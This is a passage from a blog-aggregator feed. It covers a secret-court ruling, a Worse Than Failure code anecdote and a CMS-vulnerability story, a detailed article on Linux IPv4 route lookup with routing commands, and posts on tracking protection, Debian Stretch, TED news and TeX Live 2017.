The provider's request came up amid legal briefing by both it and the DOJ concerning its challenge to a 702 order. After the DOJ cited two earlier FISC opinions that were not public at the time -- one from 2014 and another from 2008­ -- the provider asked the court for access to those rulings.

The provider argued that without being able to review the previous FISC rulings, it could not fully understand the court's earlier decisions, much less effectively respond to DOJ's argument. The provider also argued that because attorneys with Top Secret security clearances represented it, they could review the rulings without posing a risk to national security.

The court disagreed in several respects. It found that the court's rules and Section 702 prohibited the documents release. It also rejected the provider's claim that the Constitution's Due Process Clause entitled it to the documents.

This kind of government secrecy is toxic to democracy. National security is important, but we will not survive if we become a country of secret court orders based on secret interpretations of secret law.

Worse Than FailureCodeSOD: A Lazy Cat

The innermost circle of Hell, as we all know, is trying to resolve printer driver issues for all eternity. Ben doesn’t work with the printers that we mere mortals deal with on a regular basis, though. He runs a printing press, three stories of spinning steel and plates and ink and rolls of paper that could crush a man.

Like most things, the press runs Linux- a highly customized, modified version of Linux. It’s a system that needs to be carefully configured, as “disaster recovery” has a slightly different meaning on this kind of heavy equipment. The documentation, while thorough and mostly clear, was obviously prepared by someone who speaks English as a second language. Thus, Ben wanted to check the shell scripts to better understand what they did.

The first thing he caught was that each script started with variable declarations like this:

GREP="/bin/grep"
CAT="/bin/cat"

In some cases, there were hundreds of such variable declarations, because presumably, someone doesn’t trust the path variable.

Now, it’s funny we bring up cat, as a common need in these scripts is to send a file to STDOUT. You’d think that cat is just the tool for the job, but you’d be mistaken. You need a shell function called cat_file:

# function send an file to STDOUT
#
# Usage: cat_file <Filename>
#

function cat_file ()
{
        local temp
        local error
        error=0
        if [ $# -ne 1 ]; then
                temp=""
                error=1
        else
                if [ -e ${1} ]; then
                        temp="`${CAT} ${1}`"
                else
                        temp=""
                        error=1
                fi
        fi
        echo "${temp}"
        return $((error))
}

This ‘belt and suspenders’ around cat ensures that you called it with parameters, that the parameters exist, and failing that, it… well… fails. Much like cat would, naturally. This gives you the great advantage, however, that instead of writing code like this:

dev="`cat /proc/dev/net | grep eth`"

You can instead write code like this:

dev="`cat_file /proc/dev/net | ${GREP} eth`"

Much better, yes?

[Advertisement] BuildMaster integrates with an ever-growing list of tools to automate and facilitate everything from continuous integration to database change scripts to production deployments. Interested? Learn more about BuildMaster!

Planet DebianVincent Bernat: IPv4 route lookup on Linux

TL;DR: With its implementation of IPv4 routing tables using LPC-tries, Linux offers good lookup performance (50 ns for a full view) and low memory usage (64 MiB for a full view).


During the lifetime of an IPv4 datagram inside the Linux kernel, one important step is the route lookup for the destination address through the fib_lookup() function. From essential information about the datagram (source and destination IP addresses, interfaces, firewall mark, …), this function should quickly provide a decision. Some possible options are:

  • local delivery (RTN_LOCAL),
  • forwarding to a supplied next hop (RTN_UNICAST),
  • silent discard (RTN_BLACKHOLE).

Since 2.6.39, Linux stores routes into a compressed prefix tree (commit 3630b7c050d9). In the past, a route cache was maintained but it has been removed1 in Linux 3.6.

Route lookup in a trie

Looking up a route in a routing table is to find the most specific prefix matching the requested destination. Let’s assume the following routing table:

$ ip route show scope global table 100
default via 203.0.113.5 dev out2
192.0.2.0/25
        nexthop via 203.0.113.7  dev out3 weight 1
        nexthop via 203.0.113.9  dev out4 weight 1
192.0.2.47 via 203.0.113.3 dev out1
192.0.2.48 via 203.0.113.3 dev out1
192.0.2.49 via 203.0.113.3 dev out1
192.0.2.50 via 203.0.113.3 dev out1

Here are some examples of lookups and the associated results:

Destination IP Next hop
192.0.2.49 203.0.113.3 via out1
192.0.2.50 203.0.113.3 via out1
192.0.2.51 203.0.113.7 via out3 or 203.0.113.9 via out4 (ECMP)
192.0.2.200 203.0.113.5 via out2

A common structure for route lookup is the trie, a tree structure where each node has its parent as prefix.

Lookup with a simple trie

The following trie encodes the previous routing table:

Simple routing trie

For each node, the prefix is known by its path from the root node and the prefix length is the current depth.

A lookup in such a trie is quite simple: at each step, fetch the nth bit of the IP address, where n is the current depth. If it is 0, continue with the first child. Otherwise, continue with the second. If a child is missing, backtrack until a routing entry is found. For example, when looking for 192.0.2.50, we will find the result in the corresponding leaf (at depth 32). However for 192.0.2.51, we will reach 192.0.2.50/31 but there is no second child. Therefore, we backtrack until the 192.0.2.0/25 routing entry.

Adding and removing routes is quite easy. From a performance point of view, the lookup is done in constant time relative to the number of routes (due to maximum depth being capped to 32).

Quagga is an example of routing software still using this simple approach.

Lookup with a path-compressed trie

In the previous example, most nodes only have one child. This leads to a lot of unneeded bitwise comparisons and memory is also wasted on many nodes. To overcome this problem, we can use path compression: each node with only one child is removed (except if it also contains a routing entry). Each remaining node gets a new property telling how many input bits should be skipped. Such a trie is also known as a Patricia trie or a radix tree. Here is the path-compressed version of the previous trie:

Patricia trie

Since some bits have been ignored, on a match, a final check is executed to ensure all bits from the found entry are matching the input IP address. If not, we must act as if the entry wasn’t found (and backtrack to find a matching prefix). The following figure shows two IP addresses matching the same leaf:

Lookup in a Patricia trie

The reduction on the average depth of the tree compensates the necessity to handle those false positives. The insertion and deletion of a routing entry is still easy enough.

Many routing systems are using Patricia trees:

Lookup with a level-compressed trie

In addition to path compression, level compression2 detects parts of the trie that are densily populated and replace them with a single node and an associated vector of 2k children. This node will handle k input bits instead of just one. For example, here is a level-compressed version our previous trie:

Level-compressed trie

Such a trie is called LC-trie or LPC-trie and offers higher lookup performances compared to a radix tree.

An heuristic is used to decide how many bits a node should handle. On Linux, if the ratio of non-empty children to all children would be above 50% when the node handles an additional bit, the node gets this additional bit. On the other hand, if the current ratio is below 25%, the node loses the responsibility of one bit. Those values are not tunable.

Insertion and deletion becomes more complex but lookup times are also improved.

Implementation in Linux

The implementation for IPv4 in Linux exists since 2.6.13 (commit 19baf839ff4a) and is enabled by default since 2.6.39 (commit 3630b7c050d9).

Here is the representation of our example routing table in memory3:

Memory representation of a trie

There are several structures involved:

The trie can be retrieved through /proc/net/fib_trie:

$ cat /proc/net/fib_trie
Id 100:
  +-- 0.0.0.0/0 2 0 2
     |-- 0.0.0.0
        /0 universe UNICAST
     +-- 192.0.2.0/26 2 0 1
        |-- 192.0.2.0
           /25 universe UNICAST
        |-- 192.0.2.47
           /32 universe UNICAST
        +-- 192.0.2.48/30 2 0 1
           |-- 192.0.2.48
              /32 universe UNICAST
           |-- 192.0.2.49
              /32 universe UNICAST
           |-- 192.0.2.50
              /32 universe UNICAST
[...]

For internal nodes, the numbers after the prefix are:

  1. the number of bits handled by the node,
  2. the number of full children (they only handle one bit),
  3. the number of empty children.

Moreover, if the kernel was compiled with CONFIG_IP_FIB_TRIE_STATS, some interesting statistics are available in /proc/net/fib_triestat4:

$ cat /proc/net/fib_triestat
Basic info: size of leaf: 48 bytes, size of tnode: 40 bytes.
Id 100:
        Aver depth:     2.33
        Max depth:      3
        Leaves:         6
        Prefixes:       6
        Internal nodes: 3
          2: 3
        Pointers: 12
Null ptrs: 4
Total size: 1  kB
[...]

When a routing table is very dense, a node can handle many bits. For example, a densily populated routing table with 1 million entries packed in a /12 can have one internal node handling 20 bits. In this case, route lookup is essentially reduced to a lookup in a vector.

The following graph shows the number of internal nodes used relative to the number of routes for different scenarios (routes extracted from an Internet full view, /32 routes spreaded over 4 different subnets with various densities). When routes are densily packed, the number of internal nodes are quite limited.

Internal nodes and null pointers

Performance

So how performant is a route lookup? The maximum depth stays low (about 6 for a full view), so a lookup should be quite fast. With the help of a small kernel module, we can accurately benchmark5 the fib_lookup() function:

Maximum depth and lookup time

The lookup time is loosely tied to the maximum depth. When the routing table is densily populated, the maximum depth is low and the lookup times are fast.

When forwarding at 10 Gbps, the time budget for a packet would be about 50 ns. Since this is also the time needed for the route lookup alone in some cases, we wouldn’t be able to forward at line rate with only one core. Nonetheless, the results are pretty good and they are expected to scale linearly with the number of cores.

Another interesting figure is the time it takes to insert all those routes into the kernel. Linux is also quite efficient in this area since you can insert 2 million routes in less than 10 seconds:

Insertion time

Memory usage

The memory usage is available directly in /proc/net/fib_triestat. The statistic provided doesn’t account for the fib_info structures, but you should only have a handful of them (one for each possible next-hop). As you can see on the graph below, the memory use is linear with the number of routes inserted, whatever the shape of the routes is.

Memory usage

The results are quite good. With only 256 MiB, about 2 million routes can be stored!

Routing rules

Unless configured without CONFIG_IP_MULTIPLE_TABLES, Linux supports several routing tables and has a system of configurable rules to select the table to use. These rules can be configured with ip rule. By default, there are three of them:

$ ip rule show
0:      from all lookup local
32766:  from all lookup main
32767:  from all lookup default

Linux will first lookup for a match in the local table. If it doesn’t find one, it will lookup in the main table and at last resort, the default table.

Builtin tables

The local table contains routes for local delivery:

$ ip route show table local
broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1
local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1
local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1
broadcast 192.168.117.0 dev eno1 proto kernel scope link src 192.168.117.55
local 192.168.117.55 dev eno1 proto kernel scope host src 192.168.117.55
broadcast 192.168.117.63 dev eno1 proto kernel scope link src 192.168.117.55

This table is populated automatically by the kernel when addresses are configured. Let’s look at the three last lines. When the IP address 192.168.117.55 was configured on the eno1 interface, the kernel automatically added the appropriate routes:

  • a route for 192.168.117.55 for local unicast delivery to the IP address,
  • a route for 192.168.117.255 for broadcast delivery to the broadcast address,
  • a route for 192.168.117.0 for broadcast delivery to the network address.

When 127.0.0.1 was configured on the loopback interface, the same kind of routes were added to the local table. However, a loopback address receives a special treatment and the kernel also adds the whole subnet to the local table. As a result, you can ping any IP in 127.0.0.0/8:

$ ping -c1 127.42.42.42
PING 127.42.42.42 (127.42.42.42) 56(84) bytes of data.
64 bytes from 127.42.42.42: icmp_seq=1 ttl=64 time=0.039 ms

--- 127.42.42.42 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.039/0.039/0.039/0.000 ms

The main table usually contains all the other routes:

$ ip route show table main
default via 192.168.117.1 dev eno1 proto static metric 100
192.168.117.0/26 dev eno1 proto kernel scope link src 192.168.117.55 metric 100

The default route has been configured by some DHCP daemon. The connected route (scope link) has been automatically added by the kernel (proto kernel) when configuring an IP address on the eno1 interface.

The default table is empty and has little use. It has been kept when the current incarnation of advanced routing has been introduced in Linux 2.1.68 after a first tentative using “classes” in Linux 2.1.156.

Performance

Since Linux 4.1 (commit 0ddcf43d5d4a), when the set of rules is left unmodified, the main and local tables are merged and the lookup is done with this single table (and the default table if not empty). Without specific rules, there is no performance hit when enabling the support for multiple routing tables. However, as soon as you add new rules, some CPU cycles will be spent for each datagram to evaluate them. Here is a couple of graphs demonstrating the impact of routing rules on lookup times:

Routing rules impact on performance

For some reason, the relation is linear when the number of rules is between 1 and 100 but the slope increases noticeably past this threshold. The second graph highlights the negative impact of the first rule (about 30 ns).

A common use of rules is to create virtual routers: interfaces are segregated into domains and when a datagram enters through an interface from domain A, it should use routing table A:

# ip rule add iif vlan457 table 10
# ip rule add iif vlan457 blackhole
# ip rule add iif vlan458 table 20
# ip rule add iif vlan458 blackhole

The blackhole rules may be removed if you are sure there is a default route in each routing table. For example, we add a blackhole default with a high metric to not override a regular default route:

# ip route add blackhole default metric 9999 table 10
# ip route add blackhole default metric 9999 table 20
# ip rule add iif vlan457 table 10
# ip rule add iif vlan458 table 20

To reduce the impact on performance when many interface-specific rules are used, interfaces can be attached to VRF instances and a single rule can be used to select the appropriate table:

# ip link add vrf-A type vrf table 10
# ip link set dev vrf-A up
# ip link add vrf-B type vrf table 20
# ip link set dev vrf-B up
# ip link set dev vlan457 master vrf-A
# ip link set dev vlan458 master vrf-B
# ip rule show
0:      from all lookup local
1000:   from all lookup [l3mdev-table]
32766:  from all lookup main
32767:  from all lookup default

The special l3mdev-table rule was automatically added when configuring the first VRF interface. This rule will select the routing table associated to the VRF owning the input (or output) interface.

VRF was introduced in Linux 4.3 (commit 193125dbd8eb), the performance was greatly enhanced in Linux 4.8 (commit 7889681f4a6c) and the special routing rule was also introduced in Linux 4.8 (commit 96c63fa7393d, commit 1aa6c4f6b8cd). You can find more details about it in the kernel documentation.

Conclusion

The takeaways from this article are:

  • route lookup times hardly increase with the number of routes,
  • densily packed /32 routes lead to amazingly fast route lookups,
  • memory use is low (128 MiB par million routes),
  • no optimization is done on routing rules.

  1. The routing cache was subject to reasonably easy to launch denial of service attacks. It was also believed to not be efficient for high volume sites like Google but I have first-hand experience it was not the case for moderately high volume sites. 

  2. IP-address lookup using LC-tries”, IEEE Journal on Selected Areas in Communications, 17(6):1083-1092, June 1999. 

  3. For internal nodes, the key_vector structure is embedded into a tnode structure. This structure contains information rarely used during lookup, notably the reference to the parent that is usually not needed for backtracking as Linux keeps the nearest candidate in a variable. 

  4. One leaf can contain several routes (struct fib_alias is a list). The number of “prefixes” can therefore be greater than the number of leaves. The system also keeps statistics about the distribution of the internal nodes relative to the number of bits they handle. In our example, all the three internal nodes are handling 2 bits. 

  5. The measurements are done in a virtual machine with one vCPU. The host is an Intel Core i5-4670K running at 3.7 GHz during the experiment (CPU governor was set to performance). The kernel is Linux 4.11. The benchmark is single-threaded. It runs a warm-up phase, then executes about 100,000 timed iterations and keeps the median. Timings of individual runs are computed from the TSC

  6. Fun fact: the documentation of this first tentative of more flexible routing is still available in today’s kernel tree and explains the usage of the “default class”

Don MartiCatching up to Safari?

Earlier this month, Apple Safari pulled ahead of other mainstream browsers in tracking protection. Tracking protection in the browser is no longer a question of should the browser do it, but which browser best protects its users. But Apple's early lead doesn't mean that another browser can't catch up.

Tracking protection is still hard. You have to provide good protection from third-party tracking, which users generally don't want, without breaking legit third-party services such as content delivery networks, single sign-on systems, and shopping carts. Protection is a balance, similar to the problem of filtering spam while delivering legit mail. Just as spam filtering helps enable legit email marketing, tracking protection tends to enable legit advertising that supports journalism and cultural works.

In the long run, just as we have seen with spam filters, it will be more important to make protection hard to predict than to run the perfect protection out of the box. A spam filter, or browser, that always does the same thing will be analyzed and worked around. A mail service that changes policies to respond to current spam runs, or an unpredictable ecosystem of tracking protection add-ons that browser users can install in unpredictable combinations, is likely to be harder.

But most users aren't in the habit of installing add-ons, so browsers will probably have to give them a nudge, like Microsoft Windows does when it nags the user to pick an antivirus package (or did last time I checked.) So the decentralized way to catch up to Apple could end up being something like:

  • When new tracking protection methods show up in the privacy literature, quietly build the needed browser add-on APIs to make it possible for new add-ons to implement them.

  • Do user research to guide the content and timing of nudges. (Some atypical users prefer to be tracked, and should be offered a chance to silence the warnings by affirmatively choosing a do-nothing protection option.)

  • Help users share information about the pros and cons of different tools. If a tool saves lots of bandwidth and battery life but breaks some site's comment form, help the user make the right choice.

  • Sponsor innovation challenges to incentivize development, testing, and promotion of diverse tracking protection tools.

Any surveillance marketer can install and test a copy of Safari, but working around an explosion of tracking protection tools would be harder. How to set priorities when they don't know which tools will get popular?

What about adfraud?

Tracking protection strategies have to take adfraud into account. Marketers have two choices for how to deal with adfraud:

  • flight to quality

  • extra surveillance

Flight to quality is better in the long run. But it's a problem from the point of view of adtech intermediaries because it moves more ad money to high-reputation sites, and the whole point of adtech is to reach big-money eyeballs on cheap sites. Adtech firms would rather see surveillance-heavy responses to adfraud. One way to help shift marketing budgets away from surveillance, and toward flight to quality, is to make the returns on surveillance investments less predictable.

This is possible to do without making value judgments about certain kinds of sites. If you like a site enough to let it see your personal info, you should be able to do it, even if in my humble opinion it's a crappy site. But you can have this option without extending to all crappy sites the confidence that they'll be able to live on leaked data from unaware users.

,

Planet DebianSteve McIntyre: So, Stretch happened...

Things mostly went very well, and we've released Debian 9 this weekend past. Many many people worked together to make this possible, and I'd like to extend my own thanks to all of them.

As a project, we decided to dedicate Stretch to our late founder Ian Murdock. He did much of the early work to get Debian going, and inspired many more to help him. I had the good fortune to meet up with Ian years ago at a meetup attached to a Usenix conference, and I remember clearly he was a genuinely nice guy with good ideas. We'll miss him.

For my part in the release process, again I was responsible for producing our official installation and live images. Release day itself went OK, but as is typical the process ran late into Saturday night / early Sunday morning. We made and tested lots of different images, although numbers were down from previous releases as we've stopped making the full CD sets now.

Sunday was the day for the release party in Cambridge. As is traditional, a group of us met up at a local hostelry for some revelry! We hid inside the pub to escape from the ridiculouly hot weather we're having at the moment.

Party

Due to a combination of the lack of sleep and the heat, I nearly forgot to even take any photos - apologies to the extra folks who'd been around earlier whom I missed with the camera... :-(

Planet DebianAndreas Bombe: New Blog

So I finally got myself a blog to write about my software and hardware projects, my work in Debian and, I guess, stuff. Readers of planet.debian.org, hi! If you can see this I got the configuration right.

For the curious, I’m using a static site generator for this blog — Hugo to be specific — like all the cool kids do these days.

TEDListen in on couples therapy with Esther Perel, Tabby’s star dims again, and more

Behold, your recap of TED-related news:

The truth about couples. Ever wonder what goes on in couples therapy? You may want to tune in to Esther Perel’s new podcast “Where Should We Begin?” Each episode invites the reader to listen to a real session with a real couple working out real issues, from a Christian couple bored with their sex life to a couple dealing with the aftermath of an affair, learning how to cope and communicate, express and excite. Perel hopes her audience will walk away with a sense of “truth” surrounding relationships — and maybe take away something for their own relationships. As she says: “You very quickly realize that you are standing in front of the mirror, and that the people that you are listening to are going to give you the words and the language for the conversations you want to have.” The first four episodes of “Where Should We Begin?” are available on Audible, with new episodes added every Friday. (Watch Perel’s TED Talk)

Three TEDsters join the Media Lab. MIT’s Media Lab has chosen its Director’s Fellows for 2017, inviting nine extraordinary people to spend two years working with each other, MIT faculty and students to move their work forward. Two of the new Fellows are TED speakers — Adam Foss and Jamila Raqib — and a third is a TED Fellow, activist Esra’a Al Shafei. In a press release, Media Lab Director (and fellow TED speaker) Joi Ito said the new crop of fellows “aligns with our mission to create a better future for all,” with an emphasis on “civic engagement, social change, education, and creative disruption.” (Watch Foss’ TED Talk and Raqib’s TED Talk)

The mystery of KIC 8462852 deepens. Tabby’s Star, notorious for “dipping,” is making headlines again with a dimming event that started in May. Astronomer Tabetha Boyajian, the star’s namesake, has been trying to crack the mystery since the flickering was noticed in 2011. The star’s dimming is erratic—sometimes losing up to 20 percent of its brightness—and has prompted a variety of potential explanations. Some say it’s space debris, others say it’s asteroids. Many blame aliens. Nobody knows for sure, still, but you can follow Boyajian on Twitter for updates. (Watch Boyajian’s TED talk)

AI: friend or foe? The big fear with AI is that humanity will be replaced or overrun, but Nicholas Christakis has been entertaining an alternative view: how can AI complement human beings? In a new study conducted at Yale, Christakis experimented with human and AI interaction. Subjects worked with anonymous AI bots in a collaborative color-coordination game, and the bots were programmed with varying behavioral randomness — in other words, they made mistakes. Christakis’ findings showed that even when paired with error-prone AI, human performance still improved. Groups solved problems 55.6% faster when paired with bots—particularly when faced with difficult problems. “The bots can help humans to help themselves,” Christakis said. (Watch Christakis’ TED Talk)

A bundle of news from TED architects. Alejandro Aravena’s Chile-based design team, Elemental, won the competition to design the Art Mill, a new museum in Doha, Qatar. The museum site is now occupied by Qatar Flour Mills, and Elemental’s design pays homage to the large grain silos it will replace. Meanwhile, The Shed, a new building in New York City designed by Liz Diller and David Rockwell, recently underwent testing. The building is designed in two parts: an eight-level tower and a teflon-based outer shell that can slide on runners over an adjacent plaza. The large shell moves using a gantry crane, and only requires the horsepower of a Toyota Prius.  When covering the plaza, the shell can house art exhibits and performances. Finally, Joshua Prince-Ramus’ architecture firm, REX, got the nod to design a new performing arts center at Brown University. It will feature a large performance hall, smaller rehearsal spaces, and rooms for practice and instruction—as well as a lobby and cafe. (Watch Aravena’s TED Talk, Diller’s TED Talk, Rockwell’s TED Talk, and Prince-Ramus’ TED Talk)

Have a news item to share? Write us at contact@ted.com and you may see it included in this round-up.


TEDA noninvasive method for deep brain stimulation, a new class of Emerging Explorers, and much more

As usual, the TED community has lots of news to share this week. Below, some highlights.

Surface-level brain stimulation. The delivery of an electric current to the part of the brain involved in movement control, known as deep brain stimulation, is sometimes used to treat people with Parkinson’s disease, depression, epilepsy and obsessive compulsive disorder. However, the process isn’t risk-free — and there are few people who possess the skill set to open a skull and implant electrodes in the brain. A new study, of which MIT’s Ed Boyden was the senior author, has found a noninvasive method: placing electrodes on the scalp rather than in the skull. This may make deep brain stimulation available to more patients and allow the technique to be more easily adapted to treat other disorders. (Watch Boyden’s TED Talk)

Rooms for refugees. Airbnb unveiled a new platform, Welcome, which provides housing to refugees and evacuees free of charge. Using its extensive network, Airbnb is partnering with global and local organizations that will have access to Welcome in order to pair refugees with available lodging. The company aims to provide temporary housing for 100,000 displaced persons over the next five years. Airbnb co-founder, Joe Gebbia, urges anybody with a spare room to “play a small role in tackling this global challenge”; so far, 6,000 people have answered his call. (Watch Gebbia’s TED Talk)

A TEDster joins The Shed. Kevin Slavin has been named Chief Science and Technology Officer of The Shed. Set to open in 2019, The Shed is a uniquely-designed space in New York City that will bring together leading thinkers in the arts, the humanities and the sciences to create innovative art. Slavin’s multidisciplinary—or, as he puts it, anti-disciplinary—mindset seems a perfect fit for The Shed’s mission of “experimentation, innovation, and collaboration.” Slavin, who was behind the popular game Drop 7, has run a research lab at MIT’s Media Lab, and has showcased his work in MoMA, among other museums. The Shed was designed by TEDsters Liz Diller and David Rockwell. (Watch Slavin’s TED Talk, Diller’s TED Talk and Rockwell’s TED Talk)

Playing with politics. Designing a video to feel as close to real life as possible often means intricate graphics and astutely crafted scripts. For game development studio Klang, it also means replicating politics. That’s why Klang has brought on Lawrence Lessig to build the political framework for their new game, Seed. Described as “a boundless journey for human survival, fuelled by discovery, collaboration and genuine emotion,” Seed is a vast multiplayer game whose simulation continues even after a player has logged off. Players are promised “endless exploration of a living, breathing exoplanet” and can traverse this new planet forming colonies, developing relationships, and collaborating with other players. Thanks to Lessig, they can also choose their form of government and appointed officials. While the game will not center on politics, Lessig’s contributions will help the game evolve to more realistically resemble real life. (Watch Lessig’s TED Talk)

A new class of explorers. National Geographic has announced this year’s Emerging Explorers. TED Speaker Anand Varma and TED Fellows Keolu Fox and Danielle N, Lee are among them. Varma is a photographer who uses the medium to turn science into stories, as he did in his TED talk about threats faced by bees. Fox’s work connects the human genome to disease; he advocates for more diversity in the field of genetics. He believes that indigenous peoples should be included in genome sequencing not only for the sake of social justice, but for science. Studying Inuit genetics, for example, may provide insight into how they keep a traditionally fat-rich diet but have low rates of heart disease. Danielle N. Lee studies practical applications for rodents—like the African giant pouched rats trained to locate landmines. The rats are highly trainable and low-maintenance, and Lee’s research aims to tap into this unlikely resource. (Watch Varma’s TED Talk, Fox’s TED Talk and Lee’s TED Talk)

Collaborative fellowship awarded to former head of DARPA. Joining the ranks of past fellows Ruth Bader Ginsberg, Deborah Tannen and Amos Tversky is Arati Prabhakar, who has been selected for the 2017-18 fellowship at Stanford’s Center for Advanced Study in the Behavioral Sciences (CASBS). While Prabhakar’s field of expertise is in electrical engineering and applied physics, she is one of 37 fellows of various backgrounds ranging from architecture to law, and religion to statistics, to join the program. CASBS seeks to solve societal problems through interdisciplinary collaborative projects and research. At the heart of this mission is their fellowship program, says associate director Sally Schroeder. “Fellows represent all that is great about this place. It’s imperative that we continue to attract the highest quality, innovative thinkers, and we’re confident we’ve reached that standard of excellence once again with the 2017-18 class.” (Watch Prabhakar’s TED Talk)

Have a news item to share? Write us at contact@ted.com and you may see it included in this biweekly round-up.


Worse Than FailureThe CMS From Hell

Hortus Deliciarum - Hell

Contracting can be really hit or miss. Sometimes, you're given a desk and equipment and treated just like an employee, except better paid and exempt from team-building exercises. Sometimes, however, you're isolated in your home office, never speaking to anyone, working on tedious, boring crap they can't convince their normal staff to do.

Eric was contracted to perform basic website updating tasks for a government agency. Most of the work consisted of receiving documents, uploading them to the server, and adding them to a page. There were 4 document categories, each one organized by year. Dull as dishwater, but easy.

The site was hosted by a third party in a shared hosting environment. It ran on a CMS produced by another party. WTFCMS was used in many high-profile sites, so the agency figured it had to be good. Eric was given login credentials and—in the way of techies given boring tasks everywhere—immediately began automating the task at hand.

Step 1 of this automation was to get a list of articles with their IDs. Eric was pleased to discover that the browser-based interface for the CMS used a JSON request to get the list of pages. With the help of good old jq, he soon had that running in a BASH shell script. To get the list of children for an article, he passed the article's ID to the getChildren endpoint.

Usually, in a heirarchy like this, there's some magic number that means "root element." Eric tried sending a series of likely candidates, like 0, -1, MAX_INT, and MIN_INT. It turned out to be -1 ... but he also got a valid list when he passed in 0.

Curious, he thought to himself. This appears to be a list of articles ... and hey, here's the ones I got for this site. These others ...? No way.

Sure enough, passing in a parent ID of 0 had gotten Eric some sort of super-root: every article across every site in the entire CMS system. Vulnerability number 1.

Step 2 was to take the ID list and get the article data so he could associate the new file with it. This wasn't nearly as simple. There was no good way to get the text of the article from the JSON interface; the CMS populated the articles server-side.

Eric was in too deep to stop now, though. He wrote a scraper for the edit page, using an XML parser to handle the HTML form that held the article text. Once he had the text, he compared it by hand to the POST request sent from his Firefox instance to ensure he had the right data.

And he did ... mostly. Turns out, the form was manipulated by on-page Javascript before being submitted: fields were disabled or enabled, date/time formats were tweaked, and the like. Eric threw together some more scripting to get the job done, but now he wasn't sure if he would hit an edge case or somehow break the database if he ran it. Still, he soldiered on.

Step 3 was to upload the files so they could be linked to the article. With Firebug open, Eric went about adding an upload.

Now, WTFCMS seemed to offer the usual flow: enter a name, select a file, and click Upload to both upload the file and save it as the given name. When he got to step 2, however, the file was uploaded immediately—but he still had to click the Upload button to "save" it.

What happens if I click Cancel? Eric wondered. No, never mind, I don't want to know. What does the POST look like?

It was a mess of garbage. Eric was able to find the file he uploaded, and the name he'd given it ... and also a bunch of server-side information the user shouldn't be privvy to, let alone be able to tamper with. Things like, say, the directory on the server where the file should be saved. Vulnerability number 2.

The response to the POST contained, unexpectedly, HTML. That HTML contained an iframe. The iframe contained an iframe. iframe2 contained iframe3; iframe3 contained a form. In that form were two fields: a submit button, reading "Upload", and a hidden form field containing the path of the uploaded file. In theory, he could change that to read anything on the server. Now he had both read and write access to any arbitrary destination in the CMS, maybe even on the server itself. Vulnerability number 3.

It was at this point that Eric gave up on his script altogether. This is the kind of task that Selenium IDE is perfect for. He just kept his head down, hoped that the server had some kind of validation to prevent curious techies like himself from actually exploiting any of these potential vulnerabilities, and served out the rest of his contract.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet DebianFoteini Tsiami: Internationalization, part one

The first part of internationalizing a Greek application, is, of course, translating all the Greek text to English. I already knew how to open a user interface (.ui) file with Glade and how to translate/save it from there, and mail the result to the developers.

If only it was that simple! I learned that the code of most open source software is kept on version control systems, which fortunately are a bit similar to Wikis, which I was familiar with, so I didn’t have a lot of trouble understanding the concepts. Thanks to a very brief git crash course from my mentors, I was able to quickly start translating, committing, and even pushing back the updated files.

The other tricky part was internationalizing the python source code. There Glade couldn’t be used, a text editor like Pluma was needed. And the messages were part of the source code, so I had to be extra careful not to break the syntax. The English text then needed to be wrapped around _(), which does the gettext call which dynamically translates the messages into the user language.

All this was very educative, but now that the first part of the internationalization, i.e. the Greek-to-English translations, are over, I think I’ll take some time to read more about the tools that I used!


Planet DebianNorbert Preining: TeX Live 2017 hits Debian/unstable

Yesterday I uploaded the first packages of TeX Live 2017 to Debian/unstable, meaning that the new release cycle has started. Debian/stretch was released over the weekend, and this opened up unstable for new developments. The upload comprised the following packages: asymptote, cm-super, context, context-modules, texlive-base, texlive-bin, texlive-extra, texlive-extra, texlive-lang, texworks, xindy.

I mentioned already in a previous post the following changes:

  • several packages have been merged, some are dropped (eg. texlive-htmlxml) and one new package (texlive-plain-generic) has been added
  • luatex got updated to 1.0.4, and is now considered stable
  • updmap and fmtutil now require either -sys or -user
  • tlmgr got a shell mode (interactive/scripting interface) and a new feature to add arbitrary TEXMF trees (conf auxtrees)

The last two changes are described together with other news (easy TEXMF tree management) in the TeX Live release post. These changes more or less sum up the new infra structure developments in TeX Live 2017.

Since the last release to unstable (which happened in 2017-01-23) about half a year of package updates have accumulated, below is an approximate list of updates (not split into new/updated, though).

Enjoy the brave new world of TeX Live 2017, and please report bugs to the BTS!

Updated/new packages:
academicons, achemso, acmart, acro, actuarialangle, actuarialsymbol, adobemapping, alkalami, amiri, animate, aomart, apa6, apxproof, arabluatex, archaeologie, arsclassica, autoaligne, autobreak, autosp, axodraw2, babel, babel-azerbaijani, babel-english, babel-french, babel-indonesian, babel-japanese, babel-malay, babel-ukrainian, bangorexam, baskervaldx, baskervillef, bchart, beamer, beamerswitch, bgteubner, biblatex-abnt, biblatex-anonymous, biblatex-archaeology, biblatex-arthistory-bonn, biblatex-bookinother, biblatex-caspervector, biblatex-cheatsheet, biblatex-chem, biblatex-chicago, biblatex-claves, biblatex-enc, biblatex-fiwi, biblatex-gb7714-2015, biblatex-gost, biblatex-ieee, biblatex-iso690, biblatex-manuscripts-philology, biblatex-morenames, biblatex-nature, biblatex-opcit-booktitle, biblatex-oxref, biblatex-philosophy, biblatex-publist, biblatex-shortfields, biblatex-subseries, bibtexperllibs, bidi, biochemistry-colors, bookcover, boondox, bredzenie, breqn, bxbase, bxcalc, bxdvidriver, bxjalipsum, bxjaprnind, bxjscls, bxnewfont, bxorigcapt, bxpapersize, bxpdfver, cabin, callouts, chemfig, chemformula, chemmacros, chemschemex, childdoc, circuitikz, cje, cjhebrew, cjk-gs-integrate, cmpj, cochineal, combofont, context, conv-xkv, correctmathalign, covington, cquthesis, crimson, crossrefware, csbulletin, csplain, csquotes, css-colors, cstldoc, ctex, currency, cweb, datetime2-french, datetime2-german, datetime2-romanian, datetime2-ukrainian, dehyph-exptl, disser, docsurvey, dox, draftfigure, drawmatrix, dtk, dviinfox, easyformat, ebproof, elements, endheads, enotez, eqnalign, erewhon, eulerpx, expex, exsheets, factura, facture, fancyhdr, fbb, fei, fetamont, fibeamer, fithesis, fixme, fmtcount, fnspe, fontmfizz, fontools, fonts-churchslavonic, fontspec, footnotehyper, forest, gandhi, genealogytree, glossaries, glossaries-extra, gofonts, gotoh, graphics, graphics-def, graphics-pln, 